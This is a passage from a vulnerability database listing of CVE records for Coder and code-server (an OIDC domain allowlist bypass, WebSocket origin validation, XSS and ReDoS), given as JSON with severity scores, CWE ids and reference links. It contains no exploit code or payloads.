"content": {
"id": "CVE-2024-27918",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-05T17:35:12.740858Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-05T18:06:33.208Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coder",
"vendor": "coder",
"versions": [
{
"status": "affected",
"version": "\u003e= 2.8.0, \u003c 2.8.4"
},
{
"status": "affected",
"version": "\u003e= 2.7.0, \u003c 2.7.3"
},
{
"status": "affected",
"version": "\u003c 2.6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Coder allows oragnizations to provision remote development environments via Terraform. Prior to versions 2.6.1, 2.7.3, and 2.8.4, a vulnerability in Coder\u0027s OIDC authentication could allow an attacker to bypass the `CODER_OIDC_EMAIL_DOMAIN` verification and create an account with an email not in the allowlist. Deployments are only affected if the OIDC provider allows users to create accounts on the provider. During OIDC registration, the user\u0027s email was improperly validated against the allowed `CODER_OIDC_EMAIL_DOMAIN`s. This could allow a user with a domain that only partially matched an allowed domain to successfully login or register. An attacker could register a domain name that exploited this vulnerability and register on a Coder instance with a public OIDC provider.\n\nCoder instances with OIDC enabled and protected by the `CODER_OIDC_EMAIL_DOMAIN` configuration are affected. Coder instances using a private OIDC provider are not affected, as arbitrary users cannot register through a private OIDC provider without first having an account on the provider. Public OIDC providers are impacted. GitHub authentication and external authentication are not impacted. This vulnerability is remedied in versions 2.8.4, 2.7.3, and 2.6.1 All versions prior to these patches are affected by the vulnerability.*It is recommended that customers upgrade their deployments as soon as possible if they are utilizing OIDC authentication with the `CODER_OIDC_EMAIL_DOMAIN` setting."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-03-06T20:25:24.601Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf"
},
{
"name": "https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0"
},
{
"name": "https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31"
},
{
"name": "https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb"
},
{
"name": "https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c"
}
],
"source": {
"advisory": "GHSA-7cc2-r658-7xpf",
"discovery": "UNKNOWN"
},
"title": "Coder\u0027s OIDC authentication allows email with partially matching domain to register"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-27918",
"datePublished": "2024-03-06T20:25:24.601Z",
"dateReserved": "2024-02-28T15:14:14.213Z",
"dateUpdated": "2024-08-05T18:06:33.208Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26114 (GCVE-0-2023-26114)
Vulnerability from cvelistv5 – Published: 2023-03-23 05:00 – Updated: 2025-02-25 19:30
VLAI
Summary
Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.
Severity
9.3 (Critical)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
Assigner
References
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | code-server |
Affected:
0 , < 4.10.1
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.583Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-CODESERVER-3368148"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/coder/code-server/commit/d477972c68fc8c8e8d610aa7287db87ba90e55c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/coder/code-server/releases/tag/v4.10.1"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-26114",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-25T19:30:03.634202Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-346",
"description": "CWE-346 Origin Validation Error",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-25T19:30:08.466Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "code-server",
"vendor": "n/a",
"versions": [
{
"lessThan": "4.10.1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Elliot W - Snyk Research Team"
}
],
"descriptions": [
{
"lang": "en",
"value": "Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L/E:P",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1385",
"description": "Missing Origin Validation in WebSockets",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-03-23T05:00:01.220Z",
"orgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730",
"shortName": "snyk"
},
"references": [
{
"url": "https://security.snyk.io/vuln/SNYK-JS-CODESERVER-3368148"
},
{
"url": "https://github.com/coder/code-server/commit/d477972c68fc8c8e8d610aa7287db87ba90e55c7"
},
{
"url": "https://github.com/coder/code-server/releases/tag/v4.10.1"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730",
"assignerShortName": "snyk",
"cveId": "CVE-2023-26114",
"datePublished": "2023-03-23T05:00:01.220Z",
"dateReserved": "2023-02-20T10:28:48.922Z",
"dateUpdated": "2025-02-25T19:30:08.466Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-42648 (GCVE-0-2021-42648)
Vulnerability from cvelistv5 – Published: 2022-05-11 17:34 – Updated: 2024-08-04 03:38
VLAI
Summary
Cross-site scripting (XSS) vulnerability exists in Coder Code-Server before 3.12.0, allows attackers to execute arbitrary code via crafted URL.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/cdr/code-server/issues/4355 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:38:49.525Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/cdr/code-server/issues/4355"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability exists in Coder Code-Server before 3.12.0, allows attackers to execute arbitrary code via crafted URL."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-11T17:34:38.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/cdr/code-server/issues/4355"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-42648",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability exists in Coder Code-Server before 3.12.0, allows attackers to execute arbitrary code via crafted URL."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/cdr/code-server/issues/4355",
"refsource": "MISC",
"url": "https://github.com/cdr/code-server/issues/4355"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-42648",
"datePublished": "2022-05-11T17:34:38.000Z",
"dateReserved": "2021-10-18T00:00:00.000Z",
"dateUpdated": "2024-08-04T03:38:49.525Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3810 (GCVE-0-2021-3810)
Vulnerability from cvelistv5 – Published: 2021-09-17 06:15 – Updated: 2024-08-03 17:09
VLAI
Title
Inefficient Regular Expression Complexity in cdr/code-server
Summary
code-server is vulnerable to Inefficient Regular Expression Complexity
Severity
7.5 (High)
CWE
- CWE-1333 - Inefficient Regular Expression Complexity
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://huntr.dev/bounties/38888513-30fc-4d8f-805… | x_refsource_CONFIRM |
| https://github.com/cdr/code-server/commit/ca617df… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| cdr | cdr/code-server |
Affected:
unspecified , < 3.12.0
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:09:09.471Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/38888513-30fc-4d8f-805d-34070d60e223"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/cdr/code-server/commit/ca617df135e78833f93c8320cb2d2cf8bba809f5"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "cdr/code-server",
"vendor": "cdr",
"versions": [
{
"lessThan": "3.12.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "code-server is vulnerable to Inefficient Regular Expression Complexity"
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1333",
"description": "CWE-1333 Inefficient Regular Expression Complexity",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-09-17T06:15:24.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/38888513-30fc-4d8f-805d-34070d60e223"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/cdr/code-server/commit/ca617df135e78833f93c8320cb2d2cf8bba809f5"
}
],
"source": {
"advisory": "38888513-30fc-4d8f-805d-34070d60e223",
"discovery": "EXTERNAL"
},
"title": "Inefficient Regular Expression Complexity in cdr/code-server",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3810",
"STATE": "PUBLIC",
"TITLE": "Inefficient Regular Expression Complexity in cdr/code-server"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "cdr/code-server",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "3.12.0"
}
]
}
}
]
},
"vendor_name": "cdr"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "code-server is vulnerable to Inefficient Regular Expression Complexity"
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1333 Inefficient Regular Expression Complexity"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://huntr.dev/bounties/38888513-30fc-4d8f-805d-34070d60e223",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/38888513-30fc-4d8f-805d-34070d60e223"
},
{
"name": "https://github.com/cdr/code-server/commit/ca617df135e78833f93c8320cb2d2cf8bba809f5",
"refsource": "MISC",
"url": "https://github.com/cdr/code-server/commit/ca617df135e78833f93c8320cb2d2cf8bba809f5"
}
]
},
"source": {
"advisory": "38888513-30fc-4d8f-805d-34070d60e223",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3810",
"datePublished": "2021-09-17T06:15:24.000Z",
"dateReserved": "2021-09-16T00:00:00.000Z",
"dateUpdated": "2024-08-03T17:09:09.471Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}